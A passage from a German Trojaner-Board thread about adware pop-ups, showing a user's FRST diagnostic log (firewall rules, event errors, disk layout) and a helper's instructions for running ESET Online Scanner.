FirewallRules: [{494F18F7-0AF2-48C3-B32E-DC4E36F4A695}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Lego Star Wars Saga\LEGOStarWarsSaga.exe
FirewallRules: [{7ABFBE07-2B9C-45D4-84DA-8BDC90523525}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Lego Star Wars Saga\LEGOStarWarsSaga.exe
FirewallRules: [{1EC2EBE0-2617-471F-A26B-615C48A551AD}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Alien Isolation\AI.exe
FirewallRules: [{9EE2DF30-FC77-413A-9B74-E32AE2ACE7B3}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Alien Isolation\AI.exe
FirewallRules: [{E6BF45A9-3D83-40E4-964B-4F86B5818621}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\BrutalLegend\BrutalLegend.exe
FirewallRules: [{2B90CACD-2717-4D26-AB39-058D812FBB1A}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\BrutalLegend\BrutalLegend.exe
FirewallRules: [{1AB31C95-8BB4-443C-AC83-C13F30B0E182}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Outlast\OutlastLauncher.exe
FirewallRules: [{EB61ED4C-FA8E-498F-B149-1B115061AF29}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Outlast\OutlastLauncher.exe
FirewallRules: [TCP Query User{7EB0A191-C477-4A69-9ECA-5763427620C6}C:\program files (x86)\steam\steamapps\common\outlast\binaries\win64\olgame.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\outlast\binaries\win64\olgame.exe
FirewallRules: [UDP Query User{C8EBF0D7-AB7B-4587-81BC-9AE980DA249C}C:\program files (x86)\steam\steamapps\common\outlast\binaries\win64\olgame.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\outlast\binaries\win64\olgame.exe
FirewallRules: [{4E6937D5-04F5-4539-BEF7-B138490AAD23}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\DDDA\DDDA.exe
FirewallRules: [{E4B79FF8-C10A-4939-BFD2-C6DD7A08AD23}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\DDDA\DDDA.exe
FirewallRules: [{FC3688E3-900D-4493-9592-60E93E81E569}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Dead Space\Dead Space.exe
FirewallRules: [{9541C4B0-A0F1-4CFD-AA7A-A85CA57A81CF}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Dead Space\Dead Space.exe
FirewallRules: [{DB7F6160-1810-4D3A-AA8A-1DF318D24C39}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\StreetFighterVBeta\StreetFighterVBeta.exe
FirewallRules: [{0211DCB6-C60B-47C2-83F8-DE0925A954C0}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\StreetFighterVBeta\StreetFighterVBeta.exe
FirewallRules: [{F66B2D58-C6D2-4558-AE2B-72B8CC30F0B2}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Shadow Warrior\dx11\launcher.exe
FirewallRules: [{7ACD2605-EF0E-4237-B834-DACD8F211A1D}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Shadow Warrior\dx11\launcher.exe
FirewallRules: [{2E7752D5-8196-4B4E-9BCF-A348740F032F}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Shadow Warrior\sw.exe
FirewallRules: [{43895C6F-260A-4250-B2FF-012DAC6A5F0A}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Shadow Warrior\sw.exe
FirewallRules: [{034CEEEE-CF58-4BDE-80F5-11C56DC3C834}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\HardReset\hardreset.exe
FirewallRules: [{5EB7E1F4-78F6-4CE8-A68F-1B82A146C265}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\HardReset\hardreset.exe
FirewallRules: [{B5F7B177-AD34-4474-8707-35BD69708048}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\the witcher 2\Launcher.exe
FirewallRules: [{A60E6840-712B-422F-B94D-238CE2C881D3}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\the witcher 2\Launcher.exe
FirewallRules: [{5B6BA538-2A65-4BDC-A1C4-C4F39B9BA112}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Viscera Cleanup Detail Shadow Warrior\Binaries\Win32\UDK.exe
FirewallRules: [{8CA1F704-33D2-41C6-AFD6-713F677C9065}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Viscera Cleanup Detail Shadow Warrior\Binaries\Win32\UDK.exe
FirewallRules: [{71F5EF11-9C08-4E68-9CEC-CCA87E2DA2E3}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Viscera Cleanup Detail Shadow Warrior\Binaries\Win64\UDK.exe
FirewallRules: [{1CF74B5E-81F5-4603-9489-52839CE4732A}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Viscera Cleanup Detail Shadow Warrior\Binaries\Win64\UDK.exe
FirewallRules: [TCP Query User{4D2A3A39-929A-44C9-BE4B-51D5C9B62F8C}C:\program files (x86)\steam\steamapps\common\the witcher 2\bin\witcher2.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\the witcher 2\bin\witcher2.exe
FirewallRules: [UDP Query User{C587A324-FD38-4A9D-90B9-8935F9B2BDC0}C:\program files (x86)\steam\steamapps\common\the witcher 2\bin\witcher2.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\the witcher 2\bin\witcher2.exe
FirewallRules: [{4304BD98-F809-449D-98F4-B2FA301BFB1E}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Painkiller Black Edition\Bin\Painkiller.exe
FirewallRules: [{7A4CB929-6DAF-441E-A577-40F19270648D}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Painkiller Black Edition\Bin\Painkiller.exe
FirewallRules: [{E23C7F1A-F8ED-43E4-8D99-CE3195C3E57E}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\SOMA\Soma.exe
FirewallRules: [{B152291A-5595-4DD4-9F6D-F095701B770C}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\SOMA\Soma.exe
FirewallRules: [{C8163371-598A-4DAD-BB48-8E4D57CD527C}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\SOMA\ModLauncher.exe
FirewallRules: [{E7347BD0-4112-4D83-9A3A-BA5469DDAC65}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\SOMA\ModLauncher.exe
FirewallRules: [{9E90A79A-7621-4EA3-B70E-01DCC9CA0510}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Rayman Legends\Rayman Legends.exe
FirewallRules: [{5CC90406-F64C-4F7A-884D-307FFF8F09E1}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Rayman Legends\Rayman Legends.exe
FirewallRules: [{C7CCE649-9F95-4854-BB13-F429142519DA}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{EB9B2CD8-885F-4463-9E46-059856A620F2}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Mount Your Friends\MountYourFriends.exe
FirewallRules: [{50D20954-63AB-469B-AADE-1803D0DD5515}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Mount Your Friends\MountYourFriends.exe
FirewallRules: [{7175597E-D585-4038-9B8A-6F621E57BD33}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\TowerFall\TowerFall.exe
FirewallRules: [{A5E2973E-EB3A-4D87-A5C1-5FE270B9833F}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\TowerFall\TowerFall.exe
FirewallRules: [{29A96D38-8E61-42FC-9BBD-2049BFD8562C}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\DarkestDungeon\_windows\Darkest.exe
FirewallRules: [{253879B1-73BC-455A-AFAE-6A0A4B462F47}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\DarkestDungeon\_windows\Darkest.exe
FirewallRules: [{0CD7AFDF-F517-4C92-8F8E-24FF3D0FB4B9}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Sega Classics\SEGAGenesisClassics.exe
FirewallRules: [{BB4BD88E-AC21-4330-A63A-B523186D8360}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Sega Classics\SEGAGenesisClassics.exe
FirewallRules: [{94C00BF3-6892-40F5-BA09-EDE927FFFD56}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Hell Yeah\HELLYEAH.exe
FirewallRules: [{9F57C3AA-5DEF-478F-9238-502399737614}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Hell Yeah\HELLYEAH.exe
FirewallRules: [{11D8E4FE-95D0-42CA-BD4A-76A2366B9B8F}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Jet Set Radio\jsrsetup.exe
FirewallRules: [{EB4563A3-8129-4CB2-9DAA-5A95523351B0}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Jet Set Radio\jsrsetup.exe
FirewallRules: [{5060C703-A91F-4345-8415-0C89464D844F}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\dont_starve\bin\dontstarve_steam.exe
FirewallRules: [{65BAA918-D2EA-4162-AC02-D81D0A62B05A}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\dont_starve\bin\dontstarve_steam.exe
FirewallRules: [{EF8DA61F-1B7D-4363-A56F-BE332C7DF84B}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\rocketleague\Binaries\Win32\RocketLeague.exe
FirewallRules: [{BA34C35E-3197-4F29-B5C9-A46080321836}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\rocketleague\Binaries\Win32\RocketLeague.exe

==================== Wiederherstellungspunkte =========================

17-02-2016 07:27:29 DirectX wurde installiert
24-02-2016 20:34:02 Geplanter Prüfpunkt
27-02-2016 18:55:58 Wiederherstellungsvorgang

==================== Fehlerhafte Geräte im Gerätemanager =============


==================== Fehlereinträge in der Ereignisanzeige: =========================

Applikationsfehler:
==================
Error: (02/27/2016 07:43:32 PM) (Source: Avira Antivirus) (EventID: 4117) (User: NT-AUTORITÄT)
Description: 0x0

Error: (02/27/2016 07:14:34 PM) (Source: Avira Antivirus) (EventID: 4117) (User: NT-AUTORITÄT)
Description: 0x0

Error: (02/27/2016 07:11:07 PM) (Source: Avira Antivirus) (EventID: 4117) (User: NT-AUTORITÄT)
Description: 0x0

Error: (02/27/2016 07:10:55 PM) (Source: Avira Antivirus) (EventID: 4117) (User: NT-AUTORITÄT)
Description: 0x0

Error: (02/27/2016 07:10:19 PM) (Source: Avira Antivirus) (EventID: 4117) (User: NT-AUTORITÄT)
Description: 0x0

Error: (02/27/2016 07:10:05 PM) (Source: Avira Antivirus) (EventID: 4117) (User: NT-AUTORITÄT)
Description: 0x0

Error: (02/27/2016 07:09:39 PM) (Source: Avira Antivirus) (EventID: 4117) (User: NT-AUTORITÄT)
Description: 0x0

Error: (02/27/2016 07:09:23 PM) (Source: Avira Antivirus) (EventID: 4117) (User: NT-AUTORITÄT)
Description: 0x0

Error: (02/27/2016 07:07:33 PM) (Source: Avira Antivirus) (EventID: 4117) (User: NT-AUTORITÄT)
Description: 0x0

Error: (02/27/2016 07:07:26 PM) (Source: ESENT) (EventID: 455) (User: )
Description: svchost (1644) SRUJet: Fehler -1811 (0xfffff8ed) beim Öffnen von Protokolldatei C:\Windows\system32\SRU\SRU001D5.log.


Systemfehler:
=============
Error: (02/28/2016 07:36:33 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Synchronisierungshost_2f009f" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 10000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (02/28/2016 07:36:33 AM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: AnwendungsspezifischLokalAktivierung{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT-AUTORITÄTSYSTEMS-1-5-18LocalHost (unter Verwendung von LRPC)Nicht verfügbarNicht verfügbar

Error: (02/27/2016 11:08:37 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Synchronisierungshost_337c2" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 10000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (02/27/2016 11:08:37 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: AnwendungsspezifischLokalAktivierung{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT-AUTORITÄTSYSTEMS-1-5-18LocalHost (unter Verwendung von LRPC)Nicht verfügbarNicht verfügbar

Error: (02/27/2016 10:06:18 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Synchronisierungshost_35119" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 10000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (02/27/2016 10:06:18 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: AnwendungsspezifischLokalAktivierung{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT-AUTORITÄTSYSTEMS-1-5-18LocalHost (unter Verwendung von LRPC)Nicht verfügbarNicht verfügbar

Error: (02/27/2016 09:48:09 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "Windows Search" wurde aufgrund folgenden Fehlers nicht gestartet: 
%%3

Error: (02/27/2016 09:48:03 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Synchronisierungshost_3125a" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 10000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (02/27/2016 09:48:03 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: AnwendungsspezifischLokalAktivierung{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT-AUTORITÄTSYSTEMS-1-5-18LocalHost (unter Verwendung von LRPC)Nicht verfügbarNicht verfügbar

Error: (02/27/2016 09:47:39 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "Intel(R) Security Assist" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.


CodeIntegrity:
===================================
  Date: 2016-02-12 03:20:44.853
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-02-11 12:10:33.797
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-02-10 11:26:47.553
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-02-04 08:02:11.501
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-01-29 03:36:41.152
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-01-27 07:13:22.396
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-01-26 22:14:41.012
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-01-14 14:19:56.240
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-01-06 20:51:52.294
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2015-12-30 09:20:05.336
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.


==================== Speicherinformationen =========================== 

Prozessor: Intel(R) Core(TM) i7-4790K CPU @ 4.00GHz
Prozentuale Nutzung des RAM: 20%
Installierter physikalischer RAM: 8149.34 MB
Verfügbarer physikalischer RAM: 6501.17 MB
Summe virtueller Speicher: 9429.34 MB
Verfügbarer virtueller Speicher: 7684.07 MB

==================== Laufwerke ================================

Drive c: (Windows) (Fixed) (Total:930.92 GB) (Free:605.06 GB) NTFS ==>[System mit Startkomponenten (eingeholt von Laufwerk)]

==================== MBR & Partitionstabelle ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 143626DE)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=930.9 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=500 MB) - (Type=27)

==================== Ende von Addition.txt ============================
         
Ich bin gespannt!

Alt 28.02.2016, 13:21   #8
burningice
/// Malwareteam
 
Reimage Repair (u.a.) Popups - Werbe-Popups mit Firefox & Chrome - Standard

Reimage Repair (u.a.) Popups - Werbe-Popups mit Firefox & Chrome




ESET Online Scanner

  • Hier findest du eine bebilderte Anleitung zu ESET Online Scanner
  • Lade und starte Eset Online Scanner
  • Setze einen Haken bei Ja, ich bin mit den Nutzungsbedingungen einverstanden und klicke auf Starten.
  • Aktiviere die "Erkennung von eventuell unerwünschten Anwendungen" und wähle folgende Einstellungen.
  • Klicke auf Starten.
  • Die Signaturen werden heruntergeladen, der Scan beginnt automatisch.
  • Klicke am Ende des Suchlaufs auf Fertig stellen.
  • Schließe das Fenster von ESET.
  • Explorer öffnen.
  • C:\Programme\Eset\EsetOnlineScanner\log.txt (bei 64 Bit auch C:\Programme (x86)\Eset\EsetOnlineScanner\log.txt) suchen und mit Deinem Editor öffnen (bebildert).
  • Logfile hier posten.
  • Deinstallation: Systemsteuerung => Software / Programme deinstallieren => Eset Online Scanner V3 entfernen.
  • Manuell folgenden Ordner löschen und Papierkorb leeren => C:\Programme\Eset


Hinweis: Dieser Scan kann schon einmal mehrere Stunden dauern...
__________________
Mfg,
Rafael

~ I'm storm. I'm calm. I'm fire. I'm ice. I'm burningice. ~

Unterstütze uns mit einer Spende
......... Lob, Kritik oder Wünsche .........
.......... Folge uns auf Facebook ..........

Antwort

Themen zu Reimage Repair (u.a.) Popups - Werbe-Popups mit Firefox & Chrome
aktiviert, einzige, erschein, erscheint, firefox, forum, gen, hallo zusammen, leiten, popups, programme, programmen, reimage repair, schonmal, seite, seiten, surfe, surfen, troja, trojanerboard, unternehmen, welle, werbe-popups, werbung, windows, zusammen



Ähnliche Themen: Reimage Repair (u.a.) Popups - Werbe-Popups mit Firefox & Chrome


  1. Google Chrome:Seiten werden bei Klick sofort auf Werbung für "Reimage Repair; Windows 8.1 - Pc Reparatur" geleitet
    Log-Analyse und Auswertung - 16.02.2016 (30)
  2. Werbe-popups bei Firefox und IE - HILFE gesucht
    Plagegeister aller Art und deren Bekämpfung - 20.08.2015 (14)
  3. Windows 7 / Google Chrome: Browserlinks führen auf reimage repair Webseite
    Log-Analyse und Auswertung - 13.08.2015 (13)
  4. Internetbrowser (Chrome) wird mit Werbe-popups zugespammt
    Plagegeister aller Art und deren Bekämpfung - 22.02.2015 (14)
  5. Windows 8.1: Werbe-Popups in Google Chrome und Opera
    Log-Analyse und Auswertung - 24.07.2014 (16)
  6. Trojanerbefall, Werbe-popups nach sich ständig selbst installierender Chrome-Extension - Hilfe auch für jemanden der Englisch spricht?
    Plagegeister aller Art und deren Bekämpfung - 21.07.2014 (3)
  7. Nach der Installation von Windows 7 öffnen sich immer öfters popups erst in chrome nun auch in firefox
    Plagegeister aller Art und deren Bekämpfung - 04.06.2014 (19)
  8. Firefox Werbe-Popups
    Plagegeister aller Art und deren Bekämpfung - 10.05.2014 (1)
  9. Ständige Popups in Chrome sowie Firefox, langsames Internet, Avast findet keine Fehler
    Log-Analyse und Auswertung - 24.03.2014 (21)
  10. Ständiges Öffnen von PopUps bei Firefox und Chrome
    Log-Analyse und Auswertung - 05.03.2014 (7)
  11. Windows 7: Werbung und Popups im Firefox, unterstrichene Wörter mit PopUps bei Mouse-Over EXP/JAVA.Rafold.A.Gen
    Log-Analyse und Auswertung - 03.02.2014 (5)
  12. Werbe-PopUps öffnen sich in Firefox
    Plagegeister aller Art und deren Bekämpfung - 05.11.2013 (13)
  13. Windows 7 - Flashwerbung u. Popups in Firefox sowie google Chrome
    Log-Analyse und Auswertung - 18.10.2013 (18)
  14. Werbe-Popups
    Plagegeister aller Art und deren Bekämpfung - 04.04.2009 (28)
  15. Werbe-Popups...
    Log-Analyse und Auswertung - 21.02.2008 (3)
  16. Iexplorer werbe Popups
    Plagegeister aller Art und deren Bekämpfung - 17.02.2008 (30)
  17. Werbe Popups :/
    Log-Analyse und Auswertung - 10.09.2006 (18)

Zum Thema Reimage Repair (u.a.) Popups - Werbe-Popups mit Firefox & Chrome - Hallo zusammen, wenn ich Firefox öffne, erscheint auf den meisten Seiten (auch hier auf dem Trojanerboard) eine Welle von Werbung und Pop-ups...Ich habe auch Adblock testweise aktiviert; auch das bringt - Reimage Repair (u.a.) Popups - Werbe-Popups mit Firefox & Chrome...
Archiv
Du betrachtest: Reimage Repair (u.a.) Popups - Werbe-Popups mit Firefox & Chrome auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.